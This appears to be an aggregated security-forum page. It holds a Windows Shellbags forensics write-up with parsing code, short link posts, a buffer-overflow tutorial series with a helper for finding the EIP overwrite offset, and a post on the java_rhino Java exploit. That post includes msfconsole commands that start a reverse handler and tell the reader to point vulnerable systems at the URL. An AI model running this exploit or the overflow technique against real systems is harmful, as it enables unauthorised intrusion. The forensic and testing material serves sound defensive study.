    DOSTIME time;
    FILEATTR16 fileattrs;
    string short_name;
    if (offset() % 2 != 0) {
        UINT8 alignment;
    }
    UINT16 ext_size;
    UINT16 ext_version;
    if (ext_version >= 0x0003) {
        UINT16 unknown0; // == 0x0004
        UINT16 unknown1; // == 0xBEEF
        DOSDATE creation_date;
        DOSTIME creation_time;
        DOSDATE access_date;
        DOSTIME access_time;
        UINT32 unknown2;
    }
    if (ext_version >= 0x0007) {
        FILEREFERENCE file_ref;
        UINT64 unknown3;
        UINT16 long_name_size;
        if (ext_version >= 0x0008) {
            UINT32 unknown4;
        }
        wstring long_name;
        if (long_name_size > 0) {
            wstring long_name_addl;
        }
    } else if (ext_version >= 0x0003) {
        wstring long_name;
    }
    if (ext_version >= 0x0003) {
        UINT16 unknown5;
    }
    // whatever remains up to the declared size
    UINT8 padding[size - (offset() - offset(size))];
} SHITEM_FILEENTRY;

FILEREFERENCE is a 64bit MFT file reference structure (48 bits file MFT record number, 16 bits MFT sequence number). FILEATTRS is a 16 bit set of flags that specifies attributes such as if the item is read-only or a system file.

Applying this template to the ITEMPOS Registry value, we see there are four list items: one invalid entry, and three SHITEM_FILEENTRY items.

[COLOR=red]00 00 00 00 [/COLOR] --> header/footer
[COLOR=blue]00 00 00 00 [/COLOR] --> unknown padding (item position?)
[COLOR=green]00 00 00 00 [/COLOR] --> invalid SHITEM_FILEENTRY
[COLOR=yellow]00 00 00 00 [/COLOR] --> SHITEM_FILEENTRY

0000 [COLOR=red]00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[/COLOR] ................
0010 [COLOR=blue]15 00 00 00 51 00 00 00[/COLOR] [COLOR=green]14 00 1F 60 40 F0 5F 64[/COLOR] ....Q......`@._d
0020 [COLOR=green]81 50 1B 10 9F 08 00 AA 00 2F 95 4E 15[/COLOR] [COLOR=blue]00 00 00[/COLOR] .P......./.N....
0030 [COLOR=blue]A0 00 00 00[/COLOR][COLOR=yellow] 46 00 3A 00 02 02 00 00 10 3D 0C 8E[/COLOR] ....F.:......=..
0040 [COLOR=yellow]20 00 43 79 67 77 69 6E 2E 6C 6E 6B 00 00 2C 00[/COLOR] .Cygwin.lnk..,.
0050 [COLOR=yellow]03 00 04 00 EF BE 10 3D 0C 8E 10 3D 0C 8E 14 00[/COLOR] .......=...=....
0060 [COLOR=yellow]00 00 43 00 79 00 67 00 77 00 69 00 6E 00 2E 00[/COLOR] ..C.y.g.w.i.n...
0070 [COLOR=yellow]6C 00 6E 00 6B 00 00 00 1A 00[/COLOR] [COLOR=blue]15 00 00 00 02 00[/COLOR] l.n.k...........
0080 [COLOR=blue]00 00 [/COLOR][COLOR=yellow]5A 00 3A 00 42 06 00 00 10 3D 91 7C 20 00[/COLOR] ..Z.:.B....=.| .
0090 [COLOR=yellow]4D 4F 5A 49 4C 4C 7E 31 2E 4C 4E 4B 00 00 3E 00[/COLOR] MOZILL~1.LNK..>.
00A0 [COLOR=yellow]03 00 04 00 EF BE 10 3D 91 7C 10 3D 61 85 14 00[/COLOR] .......=.|.=a...
00B0 [COLOR=yellow]00 00 4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00[/COLOR] ..M.o.z.i.l.l.a.
00C0 [COLOR=yellow]20 00 46 00 69 00 72 00 65 00 66 00 6F 00 78 00[/COLOR] .F.i.r.e.f.o.x.
00D0 [COLOR=yellow]2E 00 6C 00 6E 00 6B 00 00 00 1C 00[/COLOR][COLOR=blue] 41 01 00 00[/COLOR] ..l.n.k.....A...
00E0 [COLOR=blue]51 00 00 00[/COLOR][COLOR=yellow] 30 00 31 00 00 00 00 00 10 3D 2C 81[/COLOR] Q...0.1......=,.
00F0 [COLOR=yellow]10 00 4D 49 52 00 1E 00 03 00 04 00 EF BE 10 3D[/COLOR] ..MIR..........=
0100 [COLOR=yellow]B0 80 10 3D A7 8C 14 00 00 00 4D 00 49 00 52 00[/COLOR] ...=......M.I.R.
0110 [COLOR=yellow]00 00 12 00 [/COLOR][COLOR=blue]41 01 00 00 51 00 00 00 [/COLOR][COLOR=red]00 00 00 00[/COLOR] ....A...Q.......

Taking the first valid entry from offset 0x34, let's parse out the fields from the binary. The following block visually maps out the relevant bytes, while the table translates each field into a human readable value.
[COLOR=yellow]00 00 00 00[/COLOR] --> SHITEM_FILEENTRY size
[COLOR=green]00 00 00 00[/COLOR] --> filesize
[COLOR=blue]00 00 00 00[/COLOR] --> timestamp
[COLOR=red]00 00 00 00[/COLOR] --> filename

0000 [COLOR=yellow]46 00[/COLOR] 3A 00 [COLOR=green]02 02 00 00[/COLOR] [COLOR=blue]10 3D 0C 8E[/COLOR] 20 00 [COLOR=red]43 79[/COLOR] [COLOR=yellow]F.[/COLOR]:.[COLOR=green]....[/COLOR][COLOR=blue]w.=.[/COLOR]Ž [COLOR=red]Cy[/COLOR]
0010 [COLOR=red]67 77 69 6E 2E 6C 6E 6B 00[/COLOR] 00 2C 00 03 00 04 00 [COLOR=red]gwin.lnk.[/COLOR].,.....
0020 EF BE [COLOR=blue]10 3D 0C 8E 10 3D 0C 8E [/COLOR]14 00 00 00 [COLOR=red]43 00[/COLOR] ï¾[COLOR=blue].=.Ž.=.Ž[/COLOR]....[COLOR=red]C.[/COLOR]
0030 [COLOR=red]79 00 67 00 77 00 69 00 6E 00 2E 00 6C 00 6E 00[/COLOR] [COLOR=red]y.g.w.i.n...l.n. [/COLOR]
0040 [COLOR=red]6B 00 00 00[/COLOR] 1A 00 [COLOR=red]k...[/COLOR]..

Offset  Field             Value
0x00    ITEMPOS size      0x46
0x04    Filesize          0x202
0x08    Modified Date     August 16, 2010 at 17:48:24
0x0E    8.3 Filename      Cygwin.lnk
0x22    Created Date      August 16, 2010 at 17:48:24
0x26    Modified Date     August 16, 2010 at 17:48:24
0x2E    Unicode Filename  Cygwin.lnk

At this point, it is easy to write a parser that explores the FolderData keys under the Shell registry key. For each FolderData, the parser might enumerate each ITEMPOS value and consider the binary blob. By applying the binary template above, the tool could identify filenames, MAC timestamps, and other metadata independent of the filesystem MFT. Unfortunately, we're still missing a key piece of information: the full file path.

[h=3]BagMRU tree[/h]
To recover file paths from Shellbags, we'll need to consider the Registry keys under BagMRU.
The subkeys under Shell\BagMRU form a recursive, tree-like structure that mirrors the file system on disk. Shell\BagMRU is the root of the tree. Each subkey is a node representing a folder, and like a folder, may contain children nodes. Yet, unlike (most) folders, the nodes are named as increasing integers from zero. For example, the branch Shell\BagMRU\0 might have the children 0, 1, and 2.

All nodes in this tree have a value named MRUListEx, and many have a value named NodeSlot. NodeSlot is what interests us, as it forms the link between the filesystem tree structure and the FolderData keys. A NodeSlot value has type REG_DWORD and should be interpreted as a pointer to the FolderData key with the same name. For example, on my workstation, the key Shell\BagMRU\1\1\3\0 has a NodeSlot value of 144. This means that the FolderData Shell\Bags\144\ corresponds to a folder with a path of four components. What are they? The components are described by the values at Shell\BagMRU\1, Shell\BagMRU\1\1, Shell\BagMRU\1\1\3, and Shell\BagMRU\1\1\3\0.

[h=3]SHITEMLIST[/h]
In addition to the values MRUListEx and NodeSlot, nodes of the Shell\BagMRU tree have one value for each subkey. The values have the same name as the subkey; since the subkeys are named as increasing integers, so are the values. Each value records metadata about the filesystem path component associated with the subkey. The values have type REG_BIN, and have an internal binary structure known as an SHITEMLIST. An SHITEMLIST is formed by contiguous items terminated by an empty item. Practically, though, the SHITEMLIST of a BagMRU node will have two entries: a relevant entry, and the empty terminator item. The first two bytes of each SHITEM give the item's size. Joachim's paper on Windows shell items is the best resource for understanding the variations among SHITEM entries. From a high level, there are at least ten types of items that range from SHITEM_FILEENTRY and SHITEM_FOLDERENTRY to SHITEM_CONTTROLPANELENTRY.
For each of these types, we can extract at least a path component such as "My Documents" or "\\myserver". Fortunately, most items have type SHITEM_FOLDERENTRY, which provides additional metadata including MAC timestamps. A small number of items do not conform to the known structure, although these do not usually contain any human readable strings or hints.

[h=3]Putting it all together[/h]
With the SHITEMLIST structure in hand, we now have enough information to comprehensively parse Windows shellbags. To do this, first recurse down the Shell\BagMRU keys while computing directory paths. At each node, record any available metadata and lookup the associated FolderData. Recall that the FolderData may indicate some of the items contained by the directory, so record this metadata, too. Finally, format and enjoy! The following code block lists the algorithm in a Pythonish language for the programmers in the room.

def get_shellbags():
    shellbags = []
    bagmru_key = shell_key.subkey("BagMRU")
    bags_key = shell_key.subkey("Bags")

    def shellbag_rec(key, bag_prefix, path_prefix):
        """
        Function to recursively parse the BagMRU Registry key structure.
        Arguments:
          `key`: The current 'BagsMRU' key to recurse into.
          `bag_prefix`: A string containing the current subkey path of the
            relevant 'Bags' key. It will look something like '1\\2\\3\\4'.
          `path_prefix`: A string containing the current human-readable,
            file system path so far constructed.
        Returns:
          A list of paths to filesystem artifacts
        """
        # First, consider the current key, and extract shellbag items
        slot = key.value("NodeSlot").value()
        # Look at ..\Shell, and ..\Desktop, etc.
        # (NodeSlot is a REG_DWORD; the FolderData subkey has the same name as a string)
        for bag in bags_key.subkey(str(slot)).subkeys():
            # Only consider ITEMPOS values
            for value in [value for value in bag.values() if "ItemPos" in value.name()]:
                # Call our binary processing code to extract items
                new_items = process_itempos(value)
                for item in new_items:
                    shellbags.append(path_prefix + item.path)

        # Next, recurse into each subkey of this BagMRU node (1, 2, 3, ...)
        # Only the integer-named values describe children; skip MRUListEx and NodeSlot
        for value in [value for value in key.values() if value.name().isdigit()]:
            # Call our binary processing code to extract item
            new_item = process_bag(value)
            shellbags.append(path_prefix + new_item.path)
            # Carry the accumulated path down so deeper nodes get full paths
            shellbag_rec(key.subkey(value.name()),
                         bag_prefix + "\\" + value.name(),
                         path_prefix + new_item.path)

    shellbag_rec(bagmru_key, "", "")
    return shellbags

[h=2]Shellbags.py[/h]
Using these concepts, I've implemented a cross-platform shellbag parser for Windows XP and greater in the Python programming language. The code is freely available here, so all algorithms and structures are accessible to interested parties. I've licensed the code under the Apache 2.0 license, so please feel encouraged to take and improve the routines as you feel fit. As a benchmark, shellbags.py tends to identify at least the items returned by the sbag utility, and in some cases returns more.

Shellbags.py accepts the path to a raw Registry hive acquired forensically as a command line argument. To ensure interoperability, output is formatted according to the Bodyfile specification by default. The following block lists a demonstration of me running shellbags.py against a Windows XP NTUSER.dat Registry hive.

$ python shellbags.py ~/projects/registry-files/willi/xp/NTUSER.DAT.copy0
...
    0|\My Documents (Shellbag)|0|0|0|0|0|978325200|978325200|18000|978325200
    0|\My Documents\Downloads (Shellbag)|0|0|0|0|0|1282762334|1282762334|18000|1281987456
    0|\My Documents\My Dropbox (Shellbag)|0|0|0|0|0|1281989096|1282762296|18000|1281989050
    0|\My Documents\My Music (Shellbag)|0|0|0|0|0|1281995426|1282239780|18000|1281987154
    0|\My Documents\My Pictures (Shellbag)|0|0|0|0|0|1281995426|1282239780|18000|1281987152
    0|\My Documents\My Dropbox (Shellbag)|0|0|0|0|0|978325200|978325200|18000|978325200
    0|\My Documents\My Dropbox\Tools (Shellbag)|0|0|0|0|0|1281989092|1281989092|18000|1281989088
    0|\My Documents\My Dropbox\Tools\Windows (Shellbag)|0|0|0|0|0|1281989140|1281989140|18000|1281989092
    0|\My Documents\My Dropbox\Tools\Windows\7zip (Shellbag)|0|0|0|0|0|1281993604|1284668784|18000|1281989140
    0|\My Documents\My Dropbox\Tools\Windows\Adobe (Shellbag)|0|0|0|0|0|1281994956|1284668784|18000|1281989140
    0|\My Documents\My Dropbox\Tools\Windows\Bitpim (Shellbag)|0|0|0|0|0|1281994656|1284668784|18000|1281989140
    ...

To improve readability, I ran the output through the mactime utility to generate a timeline of activity. The following block lists a portion of this sample.

    ...
    Fri Jun 10 2011 14:09:02    0 m... 0 0 0 0 \My Documents\My Dropbox\Tools\Windows\Mandiant Highlighter (Shellbag)
    Fri Jun 10 2011 16:09:56    0 m... 0 0 0 0 \My Documents\My Dropbox\Tools\Windows\Mandiant Highlighter\MandiantHighlighter1.0.1.msi (Shellbag)
    Fri Jun 10 2011 16:10:18    0 ...b 0 0 0 0 \My Documents\My Dropbox\Tools\Windows\Mandiant Highlighter\MandiantHighlighter1.1.2.msi (Shellbag)
    Fri Jun 10 2011 16:10:36    0 ma.. 0 0 0 0 \My Documents\My Dropbox\Tools\Windows\Mandiant Highlighter\MandiantHighlighter1.1.2.msi (Shellbag)
    Fri Jun 10 2011 18:20:48    0 m... 0 0 0 0 \My Computer\{00020028-0000-0041-6400-6d0069006e00}\My Dropbox\Tools\Windows\Mandiant Malware INfo (Shellbag)
    Fri Jun 10 2011 18:20:50    0 m... 0 0 0 0 \My Documents\My Dropbox\Tools\Windows\FTK\Imager_Lite_ 2.9.0 (Shellbag)
    Fri Jun 10 2011 21:06:44    0 ...b 0 0 0 0 \My Computer\C:\\Documents and Settings\Administrator\Desktop\IOCs\custom (Shellbag)
    Fri Jun 10 2011 22:43:14    0 m... 0 0 0 0 \My Computer\C:\\Documents and Settings\Administrator\Desktop\IOCs\new (Shellbag)
    Fri Jun 10 2011 22:52:02    0 m... 0 0 0 0 \My Documents\My Dropbox\Tools\Windows\FTK (Shellbag)
    ...

[h=3]Help[/h]
For reference, the following code block lists the command line parameters accepted by shellbags.py. Now get going and try it out!

    usage: shellbags.py [-h] [-v] [-p] file [file ...]

    Parse Shellbag entries from a Windows Registry.

    positional arguments:
      file        Windows Registry hive file(s)

    optional arguments:
      -h, --help  show this help message and exit
      -v          Print debugging information while parsing
      -p          If debugging messages are enabled, augment the formatting with ANSI color codes

Sursa: http://www.williballenthin.com/forensics/shellbags/index.html
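The Bodyfile lines above are only useful once something turns them into a timeline, which is what mactime did for the listing. The following is an added example, not part of shellbags.py or of the original post: a small Bodyfile reader plus the grouping mactime performs, so the "m...", "...b" and "ma.." flags in the timeline can be traced back to the four timestamp columns. The first two sample lines are copied from the shellbags.py output above; the third is constructed so that one record has four distinct times.

```python
"""Read Bodyfile lines and build a mactime-style timeline from them."""
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample input. The first two lines are copied from the shellbags.py
# output above; the third is made up so that one record has four distinct times.
SAMPLE_BODYFILE = r"""
0|\My Documents (Shellbag)|0|0|0|0|0|978325200|978325200|18000|978325200
0|\My Documents\Downloads (Shellbag)|0|0|0|0|0|1282762334|1282762334|18000|1281987456
0|\My Documents\Example (Shellbag)|0|0|0|0|0|1307728142|1307735396|1307735418|1307735436
"""

# Bodyfile (TSK 3.x) column order: MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime
FIELDS = ("md5", "name", "inode", "mode", "uid", "gid", "size",
          "atime", "mtime", "ctime", "crtime")


def parse_bodyfile(text):
    """Return one dict per non-empty line; timestamps and size become ints."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        parts = line.split("|")
        if len(parts) != len(FIELDS):
            raise ValueError("line %d: expected %d fields, got %d"
                             % (lineno, len(FIELDS), len(parts)))
        rec = dict(zip(FIELDS, parts))
        for field in ("size", "atime", "mtime", "ctime", "crtime"):
            rec[field] = int(rec[field])
        records.append(rec)
    return records


def mactime(records):
    """Group every (timestamp, name) pair and mark which of the four times it is.

    Returns [(epoch, flags, name)] sorted by time, where flags is the 'macb'
    string mactime prints: m=modified, a=accessed, c=changed, b=born (created).
    """
    letters = defaultdict(set)
    for rec in records:
        for field, letter in (("mtime", "m"), ("atime", "a"),
                              ("ctime", "c"), ("crtime", "b")):
            letters[(rec[field], rec["name"])].add(letter)
    rows = []
    for (ts, name), present in sorted(letters.items()):
        flags = "".join(l if l in present else "." for l in "macb")
        rows.append((ts, flags, name))
    return rows


def render(rows):
    """Format the rows roughly the way mactime does (UTC, since the hive has no zone)."""
    out = []
    for ts, flags, name in rows:
        when = datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%a %b %d %Y %H:%M:%S")
        out.append("%s %s %s" % (when, flags, name))
    return "\n".join(out)


if __name__ == "__main__":
    print(render(mactime(parse_bodyfile(SAMPLE_BODYFILE))))
```

Note that the ctime column of every shellbag record above is 18000 (1970-01-01 05:00 UTC), so those "..c." rows sort to the very start of a timeline and are easy to miss or to misread as real activity.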
-
Rounding Pointers – Type Safe Capabilities with C++ Meta Programming
Alexander Warg, Adam Lackorzynski
Technische Universität Dresden, Department of Computer Science, Operating Systems Group
{warg,adam}@os.inf.tu-dresden.de

ABSTRACT
Recent trends in secure operating systems indicate that an object-capability system is the security model with pre-eminent characteristics and practicality. Unlike traditional operating systems, which use a single global name space, object-capability systems name objects per protection domain. This allows a fine-grained isolation of the domains and follows the principle of least authority. Programming in such an environment differs considerably from traditional programming models. The fine-grained access to functionality requires a programming environment that supports the programmer when using a capability system. In this paper, we present an object-oriented framework that uses the C++ programming language to offer a framework for building and using operating-system components and applications.

Download: http://www.sigops.org/sosp/sosp11/workshops/plos/03-warg.pdf
-
[h=1]CSS Reference[/h]
This is an alphabetical list of CSS features. If you are going to add or modify a page, please fit in with the template CSS Reference:Property Template and modify as required. The basic template for example pages can be found here: samples/cssref/TEMPLATE.html. Feel free to discuss any questions or suggestions on the Talk:CSS Reference page. See also Mozilla CSS Extensions for Gecko-specific properties prefixed with -moz-. See Vendor-prefixed CSS Property Overview by Peter Beverloo for all prefixed properties.

Link: https://developer.mozilla.org/en/CSS/CSS_Reference
-
Metasploit sniffing the victim's network, by Mbarb
Using the Metasploit framework to sniff the victim's network can reveal interesting network communication.

A simple pentest example.
-
Encyclopaedia of Windows Privilege Escalation
A presentation.

Linux:
- Taviso
- LD_PRELOAD
- SUID binaries
- Race condition/symlink
- Crappy perl/python script
- Bad permissions

Windows:
- Taviso KiTrap0D
- Latest win32k.sys font bug
- metasploit: getSystem()
- No suid
- No env passing

Online: https://docs.google.com/viewer?url=http://www.insomniasec.com/publications/WindowsPrivEsc.ppt
Download: http://www.insomniasec.com/publications/WindowsPrivEsc.ppt
-
[h=4]Supplemental Buffer Overflow Tutorial Series[/h]

[h=4]Supplemental Buffer Overflow Tutorial Series - Part 1[/h]
Description: In this video I introduce the purpose of this series. It is just another look at buffer overflows because practice and repetition make perfect.

[h=4]Supplemental Buffer Overflow Tutorial Series - Part 2[/h]
Description: We talk about when and why a program crashes because of a buffer overflow. We diddle a little in gdb and perl.

[h=4]Supplemental Buffer Overflow Tutorial Series - Part 3[/h]
Description: In this part of the series we are looking at when the program actually crashes.

[h=4]Supplemental Buffer Overflow Tutorial Series - Part 4[/h]
Description: In this video we make a small change to the program which removes the vulnerability.

[h=4]Supplemental Buffer Overflow Tutorial Series - Part 5[/h]
Description: In this video we discuss how to find where EIP is overwritten using Binary Reduction (aka Binary Search).

[h=4]Supplemental Buffer Overflow Tutorial Series - Part 6[/h]
Description: In this part of the series we find a place to make EIP jump to so that it can execute our own code instead of crashing. We talk about little endian, nop sleds, how to find space in memory, how to use gdb to examine memory.

[h=4]Supplemental Buffer Overflow Tutorial Series - Part 7[/h]
Description: Finally we go and find shellcode. We talk about how shellcode corresponds to byte code and where to find it.

[h=4]Supplemental Buffer Overflow Tutorial Series - Part 8[/h]
Description: We wrap up our buffer overflow exploit and make it execute a shell for us. We also recap what happened to spawn the shell code and some of the implications. I introduce the Corelan tutorial series as well.

Sursa:
- http://www.securitytube.net/video/2524
- http://www.securitytube.net/video/2525
- http://www.securitytube.net/video/2526
- http://www.securitytube.net/video/2527
- http://www.securitytube.net/video/2528
- http://www.securitytube.net/video/2529
- http://www.securitytube.net/video/2530
- http://www.securitytube.net/video/2531
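Parts 5 and 6 of the series are about locating the bytes of the input that land in EIP and reading them back in little-endian order. The video does this by binary reduction; the following is an added example, not taken from the videos or the Corelan tutorials, that shows the other common way to get the same answer, the cyclic pattern used by Metasploit's pattern_create/pattern_offset, which needs only one crash. The pattern generator and offset lookup are standard; simulate_crash is an assumed toy model of the frame (buffer, then saved EBP, then the return address) and stands in for the value gdb would show in EIP after the real program crashes.

```python
"""Find the offset at which a stack overflow overwrites the saved return address.

The video series does this by binary reduction (shrinking the padding until EIP
stops changing). This added example uses the cyclic-pattern approach instead,
as in Metasploit's pattern_create/pattern_offset: every 4-byte window of the
pattern is unique, so the value found in EIP after one crash maps straight
back to its offset in the input.
"""
import itertools
import string
import struct


def pattern_create(length):
    """Build the 'Aa0Aa1Aa2...Ab0...' pattern, unique in every 4-byte window
    for up to 26*26*10*3 = 20280 bytes."""
    max_len = 26 * 26 * 10 * 3
    if length > max_len:
        raise ValueError("pattern repeats after %d bytes" % max_len)
    chunks = []
    for upper, lower, digit in itertools.product(string.ascii_uppercase,
                                                  string.ascii_lowercase,
                                                  string.digits):
        chunks.append(upper + lower + digit)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length]


def pattern_offset(pattern, eip):
    """Map the crashed EIP (an int, as gdb's `info registers` shows it) back to
    the input offset, or -1 if the value did not come from the pattern.

    x86 is little-endian: the 4 pattern bytes that overwrote the return
    address are read back in reverse order, so struct.pack('<I') undoes that.
    latin-1 keeps any byte value decodable so a non-pattern EIP just misses."""
    needle = struct.pack("<I", eip).decode("latin-1")
    return pattern.find(needle)


def simulate_crash(pattern, buffer_size, saved_regs_size=4):
    """Assumed toy model of the frame the series overflows: `buffer_size` bytes
    of buffer, then the saved EBP (4 bytes), then the return address. Returns
    the value the CPU would load into EIP on return. This layout is assumed for
    the example, not measured from any particular binary."""
    ret_offset = buffer_size + saved_regs_size
    return struct.unpack("<I", pattern[ret_offset:ret_offset + 4].encode("ascii"))[0]


if __name__ == "__main__":
    pattern = pattern_create(200)
    eip = simulate_crash(pattern, 64)
    print("EIP after crash: 0x%08x" % eip)
    print("offset of return address in input:", pattern_offset(pattern, eip))
```

Against a real target, replace simulate_crash with the EIP value gdb reports after feeding pattern_create(N) to the program; the offset returned is where the four bytes of your jump address go, followed by the nop sled and shellcode discussed in Parts 6 and 7.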
-
Cross-Platform Java Exploit (CVE-2011-3544) Demonstration
Description: This video uses Armitage and Metasploit to demonstrate a new cross-platform Java exploit. This exploit uses a loophole in the Java API to execute a payload outside of Java's security sandbox without requiring a user to approve some action. This works in Firefox, Internet Explorer, and Safari on Windows, MacOS X, and presumably Linux. Java 1.6.0u27, Java 1.7.0, and older versions are vulnerable.

Sursa: Cross-Platform Java Exploit (CVE-2011-3544) Demonstration
-
Nytro posted a topic in Stiri securitate
[h=2]Exploit for critical Java vulnerability added to Metasploit[/h]
Posted by Jonathan Cran on Nov 30, 2011 12:11:20 PM

@_sinn3r and Juan Vasquez recently released a module which exploits the Java vulnerability detailed here by mihi and by Brian Krebs here. This is a big one. To quote Krebs: "A new exploit that takes advantage of a recently-patched critical security flaw in Java is making the rounds in the criminal underground." To determine if you're running Java, you can use this link, and click "Do I have Java?" below the big red 'Free Java Download' button.

We've tested the java_rhino exploit on a number of platforms, and below is a breakout of the results. This vulnerability is particularly pernicious, as it is cross-platform, unpatched on some systems, and is an easy-to-exploit client-side that does little to make the user aware they're being exploited.

[h=4]Microsoft Windows:[/h]
Both Windows XP and Windows 7 were tested for vulnerability; a session was generated in every browser that was tested when the system was running Java versions prior to the latest. Note that Chrome did prompt the user to let them know the Java plugin was out of date, though users can still click 'Run this time' and allow the exploit to complete. No other browsers prompted the user.

- WinXP SP3 x86 / IE 7 - SESSION CREATED with versions prior to 1.6.0_29-b11
- WinXP SP3 x86 / Firefox - SESSION CREATED with versions prior to 1.6.0_29-b11
- WinXP SP3 x86 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
- WinXP SP3 x86 / Safari 5.1.1 - SESSION CREATED with versions prior to 1.6.0_29-b11
- Win7 x64 / IE 8 - SESSION CREATED with versions prior to 1.6.0_29-b11
- Win7 x64 / IE 9.0.8 - SESSION CREATED with versions prior to 1.6.0_29-b11

[h=4]Ubuntu Linux:[/h]
Several Linux desktops were tested, one with the Sun Java plugin, and another with the Iced Tea plugin.
The Iced Tea Java plugin was determined not to be vulnerable, though it wasn't tested extensively and may still be vulnerable. An attempt was made to update the Ubuntu 10.04 device, and the Java package was downloaded and linked to system Java; however, the plugin was not installed as part of this process, and thus, even though the device was running the latest (build 1.6.0_29-b11), the 10.04 device remained vulnerable. YOU MUST FOLLOW THESE INSTRUCTIONS TO INSTALL THE JAVA PLUGIN: http://www.oracle.com/technetwork/java/javase/manual-plugin-install-linux-136395.html - However, even after following these instructions, I was unable to get this process to work, and simply disabled Java on the vulnerable device.

Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin. Firefox did not; however, when I went to disable the plugin, I noticed that the 'update' button led me to a page which indicated that Java was out of date and vulnerable. It would be ideal if it prompted the user at runtime.

- Ubuntu 10.04 LTS x64 / Firefox (Oracle Java 1.6.0_26) - SESSION CREATED - no package available in the repositories
- Ubuntu 10.04 LTS x64 / Chrome (Oracle Java 1.6.0_26) - SESSION CREATED - no package available in the repositories
- Ubuntu 11.10 x64 / Chrome (Iced Tea 1.6.0_23) - NO SESSION CREATED, null pointer exception in the Iced Tea plugin

[h=4]Apple OS X:[/h]
Interesting issue here: I was forced to update, restart, then update again to get the updated Sun Java plugin. Apparently one of the updates forced a restart in the middle of the update process, and thus a second update was required to get the latest Java package. To be fair, this system wasn't updated in recent memory, but it's important to note that multiple updates may be required. This process required approximately one hour to complete. Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin.
- OS X 10.6.6 x64 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
- OS X 10.6.6 x64 / Firefox 6.0.1 - SESSION CREATED with versions prior to 1.6.0_29-b11
- OS X 10.6.6 x64 / Safari 5.0.3 - SESSION CREATED with versions prior to 1.6.0_29-b11

[h=3]Testing for the java_rhino vulnerability:[/h]
You can test this exploit in your own environment with the (framework) instructions below. We are currently prepping our weekly update for our commercial customers; it will be available in the Pro / Express / Community product later today.

    msf exploit(handler) > use exploit/multi/browser/java_rhino
    msf exploit(java_rhino) > info
    msf exploit(java_rhino) > set URIPATH xxxx
    msf exploit(java_rhino) > exploit
    [*] Exploit running as background job.
    [*] Started reverse handler on 10.0.0.11:4444
    [*] Using URL: hxxp://0.0.0.0:8080/xxxx
    [*] Local IP: hxxp://10.0.0.11:8080/xxxx
    [*] Server started.

Point vulnerable systems at the URL, and wait for your sessions.

Sursa: https://community.rapid7.com/community/metasploit/blog/2011/11/30/test-results-for-javarhino